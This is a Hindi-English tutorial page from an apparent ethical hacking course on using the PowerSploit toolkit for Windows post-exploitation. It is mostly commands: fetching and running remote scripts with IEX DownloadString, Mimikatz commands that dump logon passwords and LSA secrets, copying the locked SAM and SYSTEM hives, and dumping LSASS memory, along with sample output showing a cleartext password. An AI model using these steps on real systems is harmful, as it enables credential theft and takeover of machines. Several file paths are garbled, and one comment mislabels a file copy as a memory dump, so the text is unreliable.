Termux Learn - Ethical Hacking in Hindi | Free Mobile Hacking Course

💻 PowerSploit क्या है?

PowerSploit एक powerful PowerShell-based exploitation toolkit है जो post-exploitation, anti-forensics, और security testing के लिए modules provide करता है। यह Windows PowerShell की capabilities का use करता है।

👉 Windows post-exploitation में यह सबसे widely used PowerShell scripts collection है।

🔍 PowerSploit क्या-क्या कर सकता है

Privesc Escalation

Admin privileges gain करना

Code Execution

Remote code injection

Exfiltration

Data download/transfer

Antivirus Evasion

AMSI bypass techniques

Script Modification

In-memory execution

Recon Modules

System information gathering

⚙️ Install / Use PowerSploit

GitHubInstallation & Setup

Clone PowerSploit Repository

git clone https://github.com/PowerShellMafia/PowerSploit.git

Go to PowerSploit Directory

cd PowerSploit

👉 Note: PowerSploit directly install नहीं होता, PowerShell modules की तरह import करते हैं

Import Module (जब भी यूज़ करो)

Import-Module .PrivescPowerUp.ps1
Import-Module .ExfiltrationInvoke-NinjaCopy.ps1

Or Download Specific Script

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')

💻 Common Modules & Commands

👉 PowerSploit key modules और उनके commands:

PowerUp Privilege Escalation

Import-Module PowerUp.ps1
Invoke-AllChecks

Check for Service Vulnerabilities

Get-ServiceUnquoted
Get-ModifiableServiceFile

Invoke-Mimikatz Credentials

Import-Module Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'

Invoke-NinjaCopy File Copy

Import-Module Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "C:WindowsSystem32configSAM" -LocalDestination "C:SAM"

Invoke-Shellcode Code Execution

Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)

Out-Minidump Process Dump

Get-Process lsass | Out-Minidump -DumpFilePath C:lsass.dmp

🌐 Real Example (Practical समझ)

Example🎯 Privilege Escalation with PowerUp

# Import PowerUp module
Import-Module .PowerUp.ps1

# Run all privilege escalation checks
Invoke-AllChecks

👉 यह command system में सभी possible privilege escalation vectors check करता है

📊 Output समझो

मान लो PowerUp output कुछ ऐसा आता है:

[*] Checking service permissions...

[!] Service 'VulnService' is writable

[*] Path: C:\Program Files\VulnApp\service.exe

[*] Current user has Write access

[*] Checking for unquoted service paths...

[!] Unquoted path detected: C:\Program Files\My App\service.exe

[*] Exploit: Create malicious C:\Program.exe

🧠 इसका मतलब:

Writable

Service binary replaceable

Create malicious service.exe → gain SYSTEM

Unquoted

Unquoted service path

Create malicious C:\Program.exe → gain privileges

🔑 Credentials Extraction Example

Using Invoke-Mimikatz (PowerSploit wrapper)

Import-Module Invoke-Mimikatz.ps1

# Extract logon passwords
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

# Dump LSA secrets
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

[*] Invoke-Mimikatz executing...

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 123456

User Name : Administrator

NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Password : P@ssw0rd123

👉 PowerSploit से Mimikatz को PowerShell में wrap किया गया है → script-based automation

🔥 Advanced Example - Copy Locked Files

Copy SAM File (locked by Windows)

Import-Module Invoke-NinjaCopy.ps1

# Copy SAM registry hive (usually locked)
Invoke-NinjaCopy -Path "C:WindowsSystem32configSAM" -LocalDestination "C:	empSAM"

# Copy SYSTEM hive for decryption keys
Invoke-NinjaCopy -Path "C:WindowsSystem32configSYSTEM" -LocalDestination "C:	empSYSTEM"

# Dump LSASS process memory
Invoke-NinjaCopy -Path "C:WindowsSystem32lsass.exe" -LocalDestination "C:	emplsass.exe"

👉 What happens:

Bypass Locks

Read locked files

Copy to Local

Save to temp folder

Analyze Offline

Extract passwords

👉 Invoke-NinjaCopy allows reading files जो normally Windows द्वारा locked होते हैं like SAM, SYSTEM, LSASS

⚠️ Important Warning

PowerSploit modules का use केवल authorized systems पर करो

🚨 Critical Points:

AMSI Detection: Windows PowerShell इसे detect कर सकता है via AMSI
Execution Policy: PowerShell execution policy bypass करना पड़ सकता है
Malicious Use: बिना permission use करना cyber crime है
Educational Purpose: Test lab और authorized penetration testing के लिए use करो

📌 Official Status: PowerSploit को Microsoft ने malicious scripts से differentiate करने के लिए restructure किया, defense के लिए भी use होता है

🧩 Related Tools

Mimikatz

Native credentials tool

Empire

C2 framework

Metasploit

Exploitation framework

PowerShell Empire

PS-based post-exploitation

💡 Simple समझ

PowerSploit = "PowerShell का Swiss Army Knife"

यह Windows PowerShell की full power use करके post-exploitation tasks automate करता है। Scripts import करो, commands चलाओ और system पर complete control पा लो।